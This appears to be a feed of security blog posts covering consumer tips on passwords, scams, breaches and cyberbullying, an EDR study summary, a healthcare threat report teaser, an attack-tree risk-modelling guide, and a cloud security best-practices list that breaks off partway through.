Identity theft is a serious crime that can have devastating consequences for its victims. It occurs when a person’s personal information is stolen to be used primarily for financial gain. A detailed set of personal details is often all a hacker needs to access bank accounts, apply for loans or credit cards and basically destroy your credit rating and reputation.

How To Do a Digital Spring Clean

The good news is that digital spring cleaning doesn’t require nearly as much elbow grease as scrubbing down the microwave! Here are my top tips to add to your spring-cleaning list this year:

  1. Weed Out Your Old Devices

Gather together every laptop, desktop computer, tablet and smartphone that lives in your house. Now, you need to be strong – work out which devices are past their use-by date and which need to be spring cleaned.

If it is finally time to part ways with your first iPad or the old family desktop, make sure any important documents or holiday photos are backed up in a few places (on another computer, an external hard drive AND in cloud storage program such as Dropbox and or iCloud) so you can erase all remaining data and recycle the device with peace of mind. Careful not to get ‘deleting’ confused with ‘erasing,’ which means permanently clearing data from a device. Deleted files can often linger in a device’s recycling folder.

  1. Ensure Your Machines Are Clean!

It is not uncommon for viruses or malware to find their way onto your devices through outdated software so ensure all your internet-connected devices have the latest software updates including operating systems and browsers. Ideally, you should ensure that you are running the latest version of apps too. Most software packages do auto-update but please take the time to ensure this is happening on all your devices.

  1. Review and Consolidate Files, Applications and Services

Our devices play such a huge part in our day to day lives so it is inevitable that they become very cluttered. Your kids’ old school assignments, outdated apps and programs, online subscriptions and unused accounts are likely lingering on your devices.

The big problem with old accounts is that they get hacked! And they can often lead hackers to your current accounts so it’s a no-brainer to ensure the number of accounts you are using is kept to a minimum.

Once you have decided which apps and accounts you are keeping, take some time to review the latest privacy agreements and settings so you understand what data they are collecting and when they are collecting it. You might also discover that some of your apps are using far more of your data than you realised! Might be time to opt-out!

  1. Update Passwords and Enable Two-Factor Authentication

As the average consumer manages a whopping 11 online accounts – social media, shopping, banking, entertainment, the list goes on – updating our passwords is an important ‘cyber hygiene’ practice that is often neglected. Why not use your digital spring cleaning as an excuse to update and strengthen your credentials?

Creating long and unique passwords using a variety of upper and lowercase numbers, letters and symbols is an essential way of protecting yourself and your digital assets online. And if that all feels too complicated, why not consider a password management solution? Password managers help you create, manage and organise your passwords. Some security software solutions include a password manager such as McAfee Total Protection.

Finally, wherever possible, you should enable two-factor authentication for your accounts to add an extra layer of defense against cyber criminals. Two-factor authentication is where a user is verified by opt-out password or one-off code through a separate personal device like a smart phone.

Still not convinced? If you use social media, shop online, subscribe to specialist newsletters then your existence is scattered across the internet. By failing to clean up your ‘digital junk’ you are effectively giving a set of front door keys to hackers and risking having your identity stolen. Not a great scenario at all. So, make yourself a cuppa and get to work!

Til Next Time

Alex xx

 

 

 

 

The post How to Spring Clean Your Digital Life appeared first on McAfee Blogs.

Analyst Fatigue: The Best Never Rest

They may not be saying so, but your senior analysts are exhausted.

Each day, more and more devices connect to their enterprise networks, creating an ever-growing avenue for OS exploits and phishing attacks. Meanwhile, the number of threats—some of which are powerful enough to hobble entire cities—is rising even faster.

While most companies have a capable cadre of junior analysts, most of today’s EDR (Endpoint Detection and Response) systems leave them hamstrung. The startlingly complex nature of typical EDR software necessitates years of experience to successfully operate—meaning that no matter how willing the more “green” analysts are to help, they just don’t yet have the necessary skillset to effectively triage threats.

What’s worse, while these “solutions” require your top performers, they don’t always offer top performance in return. While your most experienced analysts should be addressing major threats, a lot of times they’re stuck wading through a panoply of false positives—issues that either aren’t threats, or aren’t worth investigating. And while they’re tied up with that, they must also confront the instances of false negatives: threats that slip through the cracks, potentially avoiding detection while those best suited to address them are busy attempting to work through the noise. This problem has gotten so bad that some IT departments are deploying MDR systems on top of their EDR packages—increasing the complexity of your company’s endpoint protection and further increasing employee stress levels.

Hoping to both measure the true impact of “analyst fatigue” on SOCs and to identify possible solutions, a commissioned study was conducted by Forrester Consulting on behalf of McAfee in March 2019 to see what effects current EDRs were having on businesses, and try to recognize the potential for solutions. Forrester surveyed security technology decision-makers, from the managers facing threats head-on to those in the C-suite viewing security solutions at the macro level in relation to his or her firm’s financial needs and level of risk tolerance. Respondents were from the US, UK, Germany or France, and worked in a variety of industries at companies ranging in size from 1,000 to over 50,000 employees.

When asked about their endpoint security goals, respondents’ top three answers—to improve security detection capabilities (87%), increase efficiency in the SOC (76%) and close the skills gap in the SecOps team (72%)—all pointed to limitations in many current EDRs.  Further inquiry revealed that while 43% of security decision makers consider automated detection a critical requirement, only 30% feel their current solution(s) completely meet their needs in this area.

While the issues uncovered were myriad, the results also suggested that a single solution could ameliorate a variety of these problems.  The introduction of EDR programs incorporating Guided Investigation could increase efficiency by allowing junior analysts to assist in threat identification, thereby freeing up more seasoned analysts to address detected threats and focus on only the most complex issues, leading to an increase in detection capabilities. Meanwhile, the hands-on experience that junior analysts would get addressing real-life EDR threats would increase both their personal efficiency and their skill level, helping to eliminate the skills gaps present in some departments.

To learn more about the problems and possibilities in the current EDR landscape, you can read the full “Empower Security Analysts Through Guided EDR Investigation” study by clicking here.

The post Analyst Fatigue: The Best Never Rest appeared first on McAfee Blogs.

Weekly Update 153

Weekly Update 153

Australia! Sunshine, good coffee and back in the water on the tail end of "winter". I'm pretty late doing this week's video as the time has disappeared rather quickly and I'm making the most of it before the next round of events. Be that as it may, there's a bunch of new stuff this week not least of which is the unexpected limit I hit with the Azure API Management consumption tier. I explain the problem in this video along with a bunch of other infosec related bits. I'll do another one from Aus later this week (if I can stick to schedule) and will try and find another nice little spot. Until then, enjoy:

Weekly Update 153
Weekly Update 153
Weekly Update 153

References

  1. I hit an unexpected limit on the consumption tier of the Azure API Management (it's frustrating, but I'm working with Microsoft on a longer term fix and mitigating the issue in the interim)
  2. The responses to DigiCert's survey on reducing maximum cert lifespans make for sad reading (there are much bigger root causes within enterprises that need sorting out)
  3. Hostinger got themselves breached (I still think the wording here is poor, surely we can do better as an industry?)
  4. Big thanks to strongDM for sponsoring my blog over the last week! (see why Splunk's CISO says "strongDM enables you to see what happens, replay & analyze incidents. You can't get that anywhere else")

Beware of Back-To-School Scams

These days it seems that there is a scam for every season, and back-to-school is no different. From phony financial aid, to debt scams, and phishing emails designed to steal your identity information, there are a lot of threats to study up on.

Of course, many of these scams are just different twists on the threats we see year-round. For instance, debt collection, tax, and imposter scams, were named some of the top frauds of 2018 by the Federal Trade Commission, costing U.S. consumers over $1.48 billion. And many of the same techniques are being directed at students, graduates, and their parents.

Here’s what to watch out for:

Identity Theft— While you might think that identity theft would only be a risk to older students applying for aid, in fact over a million children were victims of identity theft in 2017, with two thirds of them under the age of eight. This is because children’s identities can be more valuable to cyber thieves as their Social Security numbers have never been used before, so they have clean credit reports that are rarely checked.

Some savvy scammers have even started to ask parents for their child’s identity information when applying for common back-to-school activities, such as joining a sports league or after school class.

Phony Tuition Fees—“Don’t lose your spot!” This is the call to action scammers are using to trick students and parents into paying a made-up tuition fee. You may receive an official looking email, or receive a call directly from scammers, hoping to take advantage of the stress that many people feel around getting into the school of their choice. Some victims of this scam have already paid tuition, but are confused by last-minute requests for a fee to save their spot.

Financial Aid Fraud—Education has become incredibly expensive in recent years, and scammers know it. That’s why they put up ads for phony financial aid, and send phishing emails, hoping to lure applicants with the promise of guaranteed assistance, or time sensitive opportunities.

Many pose as financial aid services that charge an “advance fee” to help students apply for loans. When you fill out an application the fraudsters potentially get both your money (for the “service”) and your identity information. This can lead to identity theft, costing victims an enormous amount of time and money.

Student Loan Forgiveness—We’ve seen a proliferation of social media ads and emails offering to help student borrowers reduce, or even completely forgive, their loan debt. Some of these offers are from legitimate companies that lend advice on complicated financial matters, but others are scams, charging exorbitant fees with the promise of renegotiating your debt. Just remember, debt relief companies are not permitted to negotiate federal student loans.

Phony Student Taxes—Another common scam that targets students are phony messages and phone calls from the IRS, claiming that the victim needs to immediately pay a “federal student tax”, or face arrest. Of course, this tax does not exist.

Shopping Scams—From books, clothes, and supplies, to dorm accessories, the start of the school year often means the start of an online shopping frenzy. That’s when students and parents are susceptible to phishing emails that offer “student discounts” on popular items, or claim that they “missed a delivery” and need to click on an attachment. Links in these emails often lead to phony websites that collect their payment information, or malware. The same is true for offers of cheap or “free” downloads on normally expensive textbooks.

Here are some tips to avoid these sneaky school-related scams:

  • Be suspicious of any school programs that ask for more information than they need, like your child’s Social Security number just to join a club.
  • Only shop on reputable e-commerce sites for back to school supplies. Buy textbooks from recommended providers, and avoid any “free” digital downloads. Consider installing a web advisor to steer you away from risky websites.
  • When seeking financial aid, ask a school adviser for a list of reputable sources. Avoid any offers that sound too good to be true, like “guaranteed” or zero interest loans. Remember that it does not cost money to simply apply for financial aid.
  • If you receive any threatening emails or phone calls about loans or fees, do not respond. Instead, contact your loan provider directly to check on the status of your account.
  • Avoid using unsecured public Wi-Fi on campus, since it’s easy for a hacker to intercept the information that you are sending over the network. Only connect to secure networks that require a password.
  • Install comprehensive security software all of your computers and devices. Look for software that protects you from malware, phishing attempts, and risky websites, as well as providing identity protection.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post Beware of Back-To-School Scams appeared first on McAfee Blogs.

Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account

Today was not an easy morning for Ellen DeGeneres. She woke to find that her Instagram account was briefly hacked according to the talk show host’s Twitter and Yahoo Entertainment. A series of giveaways offering free Tesla cars, MacBooks, and more, were posted to the talk show host’s account last night. After seeing the posts, some of her followers became skeptical and warned her of the suspicious behavior. They were smart to flag the giveaways as untrustworthy because DeGeneres confirmed that her Instagram was in fact affected by malicious activity.

While Ellen joked about “password” not being the most secure password, it’s always a best practice to use strong passwords that differ from each of your other accounts to avoid easy break-ins from cybercriminals.

One of the central reasons hackers target social media accounts is to retrieve stored personal information. Once cybercriminals log into an account, they have access to everything that has ever been shared with the platform, such as date of birth, email, hometown, and answers to security questions. They then could potentially use this information to try to log into other accounts or even steal the person’s identity, depending on the level of information they have access to.

Another motive for hijacking a user’s social media account is to spread phishing scams or malware amongst the user’s network. In DeGeneres’ case, her 76 million Instagram followers were prompted to click on links that were scams disguised as giveaways so hackers could steal their personal information. In other cases, hackers will use adware so they can profit off of clicks and gain access to even more valuable information from you and your contacts. Sometimes these cybercriminals will post publicly on your behalf to reach your entire network, and other times they will read through private messages and communicate with your close network directly.

It’s not just celebrities that are vulnerable to cybercriminals. In fact, over 22% of internet users reported that their online accounts have been hacked at least once, and more than 14% said that they were hacked more than once. If your account gets hacked, the first step is to change your password right away and notify your network, so they don’t click on any specious links.

The good news is that by taking proper precautions, you can significantly reduce risk to help keep your account safe. Here are five best practices for protecting your social media accounts from malicious activity:

  • Use your best judgment and don’t click on suspicious messages or links, even if they appear to be posted by a friend.
  • Flag any scam posts or messages you encounter on social media to the platform, so they can help stop the threat from spreading.
  • Use unique, complicated passwords for all your accounts.
  • Avoid posting any identifying information or personal details that might allow a hacker to guess your security questions.
  • Always use comprehensive security software that can keep you protected from the latest threats.

To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Ellen DeGeneres Instagram Hack: What You Can Do to Protect Your Account appeared first on McAfee Blogs.

Clicks & Cliques: How to Help Your Daughter Deal with Mean Girls Online

According to a new report released by the National Center for Education Statistics (NCES), mean girls are out in force online. Data shows that girls report three times as much harassment online (21%) as boys (less than 7%). While the new data does not specify the gender of the aggressors, experts say most girls are bullied by other girls.

With school back in full swing, it’s a great time to talk with your kids — especially girls — about how to deal with cyberbullies. Doing so could mean the difference between a smooth school year and a tumultuous one.

The mean girl phenomenon, brought into the spotlight by the 2004 movie of the same name, isn’t new. Only today, mean girls use social media to dish the dirt, which can be devastating to those targeted. Mean girls are known to use cruel digital tactics such as exclusion, cliques, spreading rumors online, name-calling, physical threats, sharing explicit images of others, shaming, sharing secrets, and recruiting others to join the harassment effort.

How parents can help

Show empathy. If your daughter is the target of mean girls online, she needs your ears and your empathy. The simple, powerful phrase, “I understand,” can be an instant bridge builder. Parents may have trouble comprehending the devastating effects of cyberbullying because they, unlike their child, did not grow up under the threat of being electronically attacked or humiliated. This lack of understanding, or empathy gap, can be closed by a parent making every effort empathize with a child’s pain.

Encourage confidence and assertiveness. Mean girls target people they consider weak or vulnerable. If they know they can exploit another person publicly and get away with it, it’s game on. Even if your daughter is timid, confidence and assertiveness can be practiced and learned. Find teachable moments at home and challenge your daughter to boldly express her opinions, thoughts, and feelings. Her ability to stand up for herself will grow over time, so get started role-playing and brainstorming various ways to respond to mean girls with confidence.

Ask for help. Kids often keep bullying a secret to keep a situation from getting worse. Unfortunately, this thinking can backfire. Encourage your daughter to reach out for help if a mean girl situation escalates. She can reach out to a teacher, a parent, or a trusted adult. She can also reach out to peers. There’s power in numbers, so asking friends to come alongside during a conflict can curb a cyberbully’s efforts.

Exercise self-control. When it comes to her behavior, mean girls habitually go low, so encourage your daughter always to go high.  Regardless of the cruelty dished out, it’s important to maintain a higher standard. Staying calm, using respectful, non-aggressive language, and speaking in a confident voice, can discourage a mean girl’s actions faster than retribution.

Build a healthy perspective. Remind your daughter that even though bullying feels extremely personal, it’s not. A mean girl’s behavior reflects her own pain and character deficits, which has nothing to do with her target. As much as possible, help your daughter separate herself from the rumors or lies being falsely attached to her. Remind her of her strengths and the bigger picture that exists beyond the halls of middle school and high school.

Teach and prioritize self-care. In this context, self-care is about balance and intention. It includes spending more time doing what builds you up emotionally and physically — such as sleep and exercise — and less time doing things that deplete you (like mindlessly scrolling through Instagram).

Digitally walk away. When mean girls attack online, they are looking for a fight. However, if their audience disengages, a bully can quickly lose power and interest. Walk away digitally by not responding, unfollowing, blocking, flagging, or reporting an abusive account. Parents can also help by monitoring social activity with comprehensive software. Knowing where your child spends time online and with whom, is one way to spot the signs of cyberbullying.

Parenting doesn’t necessarily get easier as our kids get older and social media only adds another layer of complexity and concern. Even so, with consistent family conversation and connection, parents can equip kids to handle any situation that comes at them online.

The post Clicks & Cliques: How to Help Your Daughter Deal with Mean Girls Online appeared first on McAfee Blogs.

Healthcare: Research Data and PII Continuously Targeted by Multiple Threat Actors

The healthcare industry faces a range of threat groups and malicious activity. Given the critical role that healthcare plays within society and its relationship with our most sensitive information, the risk to this sector is especially consequential. It may also be one of the major reasons why we find healthcare to be one of the most retargeted industries.

In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights, however, these are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While difficult to fully assess the extent, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost to Western firms.
  • Healthcare databases for sale under $2,000:  The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 dollars (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

Lights, Camera, Cybersecurity: What You Need to Know About the MoviePass Breach

If you’re a frequent moviegoer, there’s a chance you may have used or are still using movie ticket subscription service and mobile app MoviePass. The service is designed to let film fanatics attend a variety of movies for a convenient price, however, it has now made data convenient for cybercriminals to potentially get ahold of. According to TechCrunch, the exposed database contained 161 million records, with many of those records including sensitive user information.

So, what exactly do these records include? The exposed user data includes 58,000 personal credit cards and customer card numbers, which are similar to normal debit cards. They are issued by Mastercard and store a cash balance that users can use to pay so they can watch a catalog of movies. In addition to the MoviePass customer cards and financial information numbers, other exposed data includes billing addresses, names, and email addresses. TechCrunch reported that a combination of this data could very well be enough information to make fraudulent purchases.

The database also contained what researchers presumed to be hundreds of incorrectly typed passwords with user email addresses. With this data, TechCrunch attempted to log into the database using a fake email and password combination. Not only did they immediately gain access to the MoviePass account, but they found that the fake login credentials were then added to the database.

Since then, TechCrunch reached out to MoviePass and the company has since taken the database offline. However, with this personal and financial information publicly accessible for quite some time, users must do everything in their power to safeguard their data. Here are some tips to help keep your sensitive information secure:

  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Lights, Camera, Cybersecurity: What You Need to Know About the MoviePass Breach appeared first on McAfee Blogs.

Define Your Unique Security Threats with These Tools

It takes only minutes from the first action of an attack with 5 or less steps for an asset to be compromised, according to the 2019 Verizon Data Breach Investigations Report (DBIR).  However, it takes days—an average of 279 days—to identify and contain a breach (Ponemon Institute). And the longer it takes to discover the source, the more money the incident ends up costing the organization.  Luckily, you can reduce your chance of falling victim to these attacks by proactively anticipating your greatest threats and taking measures to mitigate these.

This blog post breaks down two tools to help you determine just that: your most at-risk data, how this data can be accessed, and the attacker’s motives and abilities.  Once you have an understanding of these, it will be much easier to implement countermeasures to protect your organization from those attacks.

I recommend first reading through the DBIR sections pertaining to your industry in order to further your understanding of patterns seen in the principal assets being targeted and the attacker’s motives.  This will assist in understanding how to use the two tools: Method-Opportunity-Motive, by Shari and Charles Pfleeger and Attack Trees, as discussed by Bruce Schneier.

Defining Method-Opportunity-Motive:

Method

Methods are skills, knowledge and tools available to the hacker, which are similar to Tactics, Techniques, and Procedures used by the Military and MITTR. Jose Esteves et. al. wrote, “Although it used to be common for hackers to work independently, few of today’s hackers operate alone. They are often part of an organized hacking group, where they are members providing specialized illegal services….” A hacker’s methods are improved when part of a team, which has a motive and looks for opportunities to attack principle assets.

Opportunity

Opportunities are the amount of time and ability required for an attacker to access their objective.  The 2019 DBIR authors’ note, “Defenders fail to stop short paths substantially more often than long paths.” It’s critical to apply the correct controls to assets and to monitor those tools in order to quickly detect threats.

 Motive

The motive is the reason to attack; for instance, is the attacker trying to access financial information or intellectual property? The 2019 DBIR notes that most attacks are for financial gains or intellectual property (IP), varying by industry.

Using Attack Trees to Visually Detail Method-Opportunity-Motive:

Bruce Schneier (Schneier on Security) provides an analytics tool for systematically reviewing why and how an attack might occur. After defining what assets are most valuable to an attacker (motive), you can identify the attacker’s objective, referred to as the root node in an attack tree. From here, you can look at all the possible actions an attacker might use to compromise the primary assets (method).  The most probable and timely method shows the most likely path (opportunity).

I like using divergent and convergent thinking described by Chris Grivas and Gerard Puccio to discover plausible motive, opportunity, and methods used by a potential threat actor. Divergent thinking is the generation of ideas, using techniques like brainstorming. Convergent thinking is the limiting of ideas based on certain criteria. Using this process, you and your security team can generate objectives and then decide which objectives pose the greatest threat. You can then use this process again to determine the possible methods, referred to as leaf nodes, that could be used to access the objective. Then, you can apply values, such as time, to visualize possible opportunities and attack paths.

To further your understanding of how to create an attack tree, let’s look at an example:

1.  First, decide what primary assets your company has that an intruder is interested in accessing.

The 2019 DBIR provides some useful categories to determine attack patterns within specific industries.  For this example, let’s look at a financial institution. One likely asset that a threat actor is attempting to access is the email server, so this is our root node, or objective. Again, using divergent and convergent thinking can help a team develop and clarify possible objectives.

2.  After deciding on the objective, the second step in developing an attack tree is to define methods to access the objective.

The 2019 DBIR describes some likely methods threat actors might use, or you can use divergent and convergent thinking. In the example below, I’ve included some possible methods to access the email server.

Attack Tree Visualization

3.  As you analyze the threat, continue working through the tree and building out the methods to develop specific paths to the asset.

The diagram below shows some potential paths to access and harvest information from the email server, using OR nodes, which are alternative paths, and AND nodes, which require combined activities to achieve the objective (this is represented using ). Note that every method that isn’t an AND node is an OR node.

Attack Tree Visualization

4.  The fourth step is to apply binary values to decide what paths the attack is most likely to follow.

For example, I’m going to use likely (l) and unlikely (u) based on the methods my research has shown is available to the attacking team. Then, use a dotted line to show the all likely paths, which are those in which all methods of the path are assigned a likely value.

Attack Tree Visualization

5.  The fifth step is to apply numeric values to the sub-nodes to decide on what path, specifically, the threat actor might attempt.

I’m going to use minutes in this scenario; however, other values such as associated costs or probability of success could also be used. These are subjective values and will vary amongst teams. Paths with supporting data would provide a more accurate model, but Attack Trees are still useful even without objective data.

Attack Tree Visualization

In the above example, I have determined the path with the shortest amount of time to be phishing (credential harvesting), assuming the credentials are the same for the user accounts as they are for admin accounts. Since I have already determined that this path is likely and I now know it takes the shortest amount of time, I can determine that this is the most at-risk and likely path to accessing the email server.  In this example, the least likely path is stolen credentials.

6.  After examining the possible motives, opportunities, and methods, you can decide how you want to protect your assets.

For example, I determined that phishing is likely with the attack tree above, so I might decide to outsource monitoring, detection, and training to a Managed Security Service Provider (MSSP) that can provide this at a lower cost than an in-house staff. I might also consider purchasing software to detect, report, and prevent phishing emails, limiting the possibility of a phishing attempt. If social engineering is determined to be a concern, you could conduct end-user training, look for ways to secure the physical environment (guards, better door locks), or make the work environment more desirable (cafeteria, exercise room, recreation area, etc.)

The models discussed work together to provide ways to determine, analyze, and proactively protect against the greatest threats to your valuable assets. Ultimately, thinking through scenarios using these tools will provide a more thoughtful and cost-effective approach to security.

The post Define Your Unique Security Threats with These Tools appeared first on GRA Quantum.

19 Cloud Security Best Practices for 2019

Now well into its second decade of commercial availability, cloud computing has become near-ubiquitous, with roughly 95 percent of businesses reporting that they have a cloud strategy. While cloud providers are more secure than ever before, there are still risks to using any cloud service. Fortunately, they can be largely mitigated by following these cloud security best practices:

Protect Your Cloud Data

  1. Determine which data is the most sensitive. While applying the highest level of protection across the board would naturally be overkill, failing to protect the data that is sensitive puts your enterprise at risk of intellectual property loss or regulatory penalties. Therefore, the first priority should be to gain an understanding of what to protect through data discovery and classification, which is typically performed by a data classification engine. Aim for a comprehensive solution that locates and protects sensitive content on your network, endpoints, databases and in the cloud, while giving you the appropriate level of flexibility for your organization.
  2. How is this data being accessed and stored? While it’s true that sensitive data can be stored safely in the cloud, it certainly isn’t a foregone conclusion. According to the McAfee 2019 Cloud Adoption and Risk Report, 21 percent of all files in the cloud contain sensitive data—a sharp increase from the year before1. While much of this data lives in well-established enterprise cloud services such as Box, Salesforce and Office365, it’s important to realize that none of these services guarantees 100 percent safety. That’s why it’s important to examine the permissions and access context associated with data in your cloud environment and adjust appropriately. In some cases, you may need to remove or quarantine sensitive data already stored in the cloud.
  3. Who should be able to share it, and how? Sharing of sensitive data in the cloud has increased by more than 50% year over year.1 Regardless of how powerful your threat mitigation strategy is, the risks are far too high to take a reactive approach: access control policies should be established and enforced before data ever enters the cloud. Just as the number of employees who need the ability to edit a document is much smaller than the number who may need to view it, it is very likely that not everyone who needs to be able to access certain data needs the ability to share Defining groups and setting up privileges so that sharing is only enabled for those who require it can drastically limit the amount of data being shared externally.
  4. Don’t rely on cloud service encryption. Comprehensive encryption at the file level should be the basis of all your cloud security efforts. While the encryption offered within cloud services can safeguard your data from outside parties, it necessarily gives the cloud service provider access to your encryption keys. To fully control access, you’ll want to deploy stringent encryption solutions, using your own keys, before uploading data to the cloud.

Minimize Internal Cloud Security Threats  

  1. Bring employee cloud usage out of the shadows. Just because you have a corporate cloud security strategy in place doesn’t mean that your employees aren’t utilizing the cloud on their own terms. From cloud storage accounts like Dropbox to online file conversion services, most people don’t consult with IT before accessing the cloud. To measure the potential risk of employee cloud use, you should first check your web proxy, firewall and SIEM logs to get a complete picture of which cloud services are being utilized, and then conduct an assessment of their value to the employee/organization versus their risk when deployed wholly or partially in the cloud. Also, keep in mind that shadow usage doesn’t just refer to known endpoints accessing unknown or unauthorized services—you’ll also need a strategy to stop data from moving from trusted cloud services to unmanaged devices you’re unaware of. Because cloud services can provide access from any device connected to the internet, unmanaged endpoints such as personal mobile devices create a hole in your security strategy. You can restrict downloads to unauthorized devices by making device security verification a prerequisite to downloading files.
  2. Create a “safe” list. While most of your employees are utilizing cloud services for above-the-board purposes, some of them will inadvertently find and use dubious cloud services. Of the 1,935 cloud services in use at the average organization, 173 of them rank as high-risk services.1 By knowing which services are being used at your company, you’ll be able to set policies 1.) Outlining what sorts of data are allowed in the cloud, 2.) Establishing a “safe” list of cloud applications that employees can utilize, and 3.) Explaining the cloud security best practices, precautions and tools required for secure utilization of these applications.
  3. Endpoints play a role, too. Most users access the cloud through web browsers, so deploying strong client security tools and ensuring that browsers are up-to-date and protected from browser exploits is a crucial component of cloud security. To fully protect your end-user devices, utilize advanced endpoint security such as firewall solutions, particularly if using IaaS or PaaS models.
  4. Look to the future. New cloud applications come online frequently, and the risk of cloud services evolves rapidly, making manual cloud security policies difficult to create and keep up to date. While you can’t predict every cloud service that will be accessed, you can automatically update web access policies with information about the risk profile of a cloud service in order to block access or present a warning message. Accomplish this through integration of closed-loop remediation (which enforces policies based on a service-wide risk rating or distinct cloud service attributes) with your secure web gateway or firewall. The system will automatically update and enforce policies without disrupting the existing environment.
  5. Guard against careless and malicious users. With organizations experiencing an average of 14.8 insider threat incidents per month—and 94.3 percent experiencing an average of at least one a month—it isn’t a matter of if you will encounter this sort of threat; it’s a matter of when. Threats of this nature include both unintentional exposure—such as accidentally disseminating a document containing sensitive data—as well as true malicious behavior, such as a salesperson downloading their full contact list before leaving to join a competitor. Careless employees and third-party attackers can both exhibit behavior suggesting malicious use of cloud data. Solutions leveraging both machine learning and behavioral analytics can monitor for anomalies and mitigate both internal and external data loss.
  6. Trust. But verify. Additional verification should be required for anyone using a new device to access sensitive data in the cloud. One suggestion is to automatically require two-factor authentication for any high-risk cloud access scenarios. Specialized cloud security solutions can introduce the requirement for users to authenticate with an additional identity factor in real time, leveraging existing identity providers and identity factors (such as a hard token, a mobile phone soft token, or text message) already familiar to end users.

Develop Strong Partnerships with Reputable Cloud Providers

  1. Regulatory compliance is still key. Regardless of how many essential business functions are shifted to the cloud, an enterprise can never outsource responsibility for compliance. Whether you’re required to comply with the California Consumer Privacy Act, PCI DSS, GDPR, HIPAA or other regulatory policies, you’ll want to choose a cloud architecture platform that will allow you to meet any regulatory standards that apply to your industry. From there, you’ll need to understand which aspects of compliance your provider will take care of, and which will remain under your purview. While many cloud service providers are certified for myriad industry and governmental regulations, it’s still your responsibility to build compliant applications and services on the cloud, and to maintain that compliance going forward. It’s important to note that previous contractual obligations or legal barriers may prohibit the use of cloud services on the grounds that doing so constitutes relinquishing control of that data.
  2. But brand compliance is important, too. Moving to the cloud doesn’t have to mean sacrificing your branding strategy. Develop a comprehensive plan to manage identities and authorizations with cloud services. Software services that comply with SAML, OpenID or other federation standards make it possible for you to extend your corporate identity management tools into the cloud.
  3. Look for trustworthy providers. Cloud service providers committed to accountability, transparency and meeting established standards will generally display certifications such as SAS 70 Type II or ISO 27001. Cloud service providers should make readily accessible documentation and reports, such as audit results and certifications, complete with details relevant to the assessment process. Audits should be independently conducted and based on existing standards. It is the responsibility of the cloud provider to continuously maintain certifications and to notify clients of any changes in status, but it’s the customer’s responsibility to understand the scope of standards used—some widely used standards do not assess security controls, and some auditing firms and auditors are more reliable than others.
  4. How are they protecting you? No cloud service provider offers 100 percent security. Over the past several years, many high profile CSPs have been targeted by hackers, including AWS, Azure, Google Drive, Apple iCloud, Dropbox, and others. It’s important to examine the provider’s data protection strategies and multitenant architecture, if relevant—if the provider’s own hardware or operating system are compromised, everything hosted within them is automatically at risk. For that reason, it’s important to use security tools and examine prior audits to find potential security gaps (and if the provider uses their own third-party providers, cloud security best practices suggest you examine their certifications and audits as well.) From there, you’ll be able to determine what security issues must be addressed on your end. For example, fewer than 1 in 10 providers encrypt data stored at rest, and even fewer support the ability for a customer to encrypt data using their own encryption keys.1 Finding providers that both offer comprehensive protection as well as the ability for users to bridge any gaps is crucial to maintaining a strong cloud security posture.
  5. Investigate cloud provider contracts and SLAs carefully. The cloud services contract is your only guarantee of service, and your primary recourse should something go wrong—so it is essential to fully review and understand all terms and conditions of your agreement, including any annexes, schedules and appendices. For example, a contract can make the difference between a company who takes responsibility for your data, and a company that takes ownership of your data. (Only 37.3 % of providers specify that customer data is owned by the customer. The rest either don’t legally specify who owns the data, creating a legal grey area—or, more egregiously, claim ownership of all uploaded data.1) Does the service offer visibility into security events and responses? Is it willing to provide monitoring tools or hooks into your corporate monitoring tools? Does it provide monthly reports on security events and responses? And what happens to your data if you terminate the service? (Keep in mind that only 13.3 percent of cloud providers delete user data immediately upon account termination. The rest keep data for up to a year, with some specifying they have a right to keep it indefinitely.) If you find parts of the contract objectionable, you can try to negotiate—but in the case where you’re told that certain terms are non-negotiable, it is up to you to determine whether the risk presented by accepting the terms as-is is an acceptable one to your business. If not, you’ll need to find alternate means of managing the risk, such as encryption or monitoring, or find another provider.
  6. What happens if something goes wrong? Since no two cloud service providers offer the same set of security controls—and again, no cloud provider delivers 100 percent security—developing an Incident Response (IR) plan is critical. Make sure the provider includes you and considers you a partner in creating such plans. Establish communication paths, roles and responsibilities with regard to an incident, and to run through the response and hand-offs ahead of time. SLAs should spell out the details of the data the cloud provider will provide in the case of an incident, how data will be handled during incidents to maintain availability, and guarantee the support necessary to effectively execute the enterprise IR plan at each stage. While continuous monitoring will offer the best chance at early detection, full-scale testing should be performed on at least an annual basis, with additional testing coinciding with major changes to the architecture.
  7. Protect your IaaS environments. When using IaaS environments such as AWS or Azure, you retain responsibility for the security of operating systems, applications, and network traffic. Advanced anti-malware technology should be applied to the OS and virtual network to protect your infrastructure. Deploy application whitelisting and memory exploit prevention for single-purpose workloads and machine learning-based protection for file stores and general-purpose workloads.
